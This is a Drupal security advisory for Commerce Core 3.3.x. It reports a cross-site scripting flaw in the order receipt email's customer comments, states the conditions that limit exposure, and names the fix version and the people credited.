Project: Commerce CoreDate: 2026-June-03Security risk: Moderately critical 14 ∕ 25 AC:Basic/A:None/CI:Some/II:Some/E:Theoretical/TD:UncommonVulnerability: Cross site scriptingAffected versions: >= 3.3.0 < 3.3.6CVE IDs: CVE-2026-10769Description: The module doesn't sufficiently sanitize customer comments in the order receipt email template; this could be exploited to achieve Cross-site Scripting (XSS). This vulnerability is mitigated by the fact that it only affects installations with Checkout (commerce_checkout) enabled, and the "Comments" checkout pane (id: customer_comments) is explicitly used, which is disabled by default.Solution: Install the latest version: If you use Commerce Core 3.3.x, upgrade to Commerce Core 3.3.6 Reported By:  Brian Willows (hsjbrianwillows) Fixed By:  Jonathan Sacksick (jsacksick) Coordinated By:  Greg Knaddison (greggles) of the Drupal Security Team Lee Rowlands (larowlan) of the Drupal Security Team Dave Long (longwave) of the Drupal Security Team Juraj Nemec (poker10) of the Drupal Security Team